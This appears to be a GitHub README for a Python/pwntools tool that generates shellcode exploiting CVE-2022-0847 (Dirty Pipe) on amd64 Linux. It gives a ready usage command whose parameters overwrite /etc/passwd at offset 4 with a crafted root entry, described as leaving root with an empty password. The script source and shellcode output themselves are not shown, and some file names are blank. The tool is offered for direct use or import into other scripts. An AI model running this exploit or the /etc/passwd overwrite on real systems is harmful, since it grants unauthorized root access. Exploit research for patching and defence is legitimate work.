# cve_2022_0847_shellcode

## Description

This repository contains a Python script (``````), based on pwntools, to generate a shellcode implementing [CVE-2022-0847]( <br>
The shellcode is based on this Poc: [antx]( <br>
I analyzed the code of the PoC and its execution with strace to catch all the system calls required to make the exploit, and at first I wrote a C program that uses ```syscall.h```; it was still not suitable for a shellcode, but it's good for reference, so I shipped it here (```tiny_cve-2022-0847.c```). <br>
The function which generates the shellcode takes 3 parameters: path of the file to write to, data to write and offset at which data must be written. <br>
An example of generated shellcode, in disassemble format from objdump, can be found in ```shellcode.asm```; it was generated with the following parameters:

- filename ```/etc/passwd```
- data ```:$1$$qRPK7m23GJusamGpoGLby/:0:0::/:/bin/sh\n```
- offset ```4```

It leaves the root with an empty password.

## Usage

$ python 
Usage: filename data offset [verbose (any value here sets verbose to True)]

You can import the function ```cve_2022_0847```, which generates the shellcode, to call it in other scripts, or directly use this script; there is an ```example_usage``` function which calls ```cve_2022_0847``` and makes an ELF with the shellcode. <br>
The ```cve_2022_0847``` also performs some basic sanity checks, and it prints what can go wrong with the exploit and the disassembled shellcode if ```verbose``` parameter is set. <br>
It returns the assembled shellcode. The ```main``` function calls ```cve_2022_0847``` with the command line parameters and prints the resulting shellcode in C-style hex, i.e. without decoding printable bytes. For example:

$ python /etc/passwd ":$1$$qRPK7m23GJusamGpoGLby/:0:0::/:/bin/sh\n" 4
Resulting shellcode:

## Disclaimer

Supported architecture is only ```amd64```.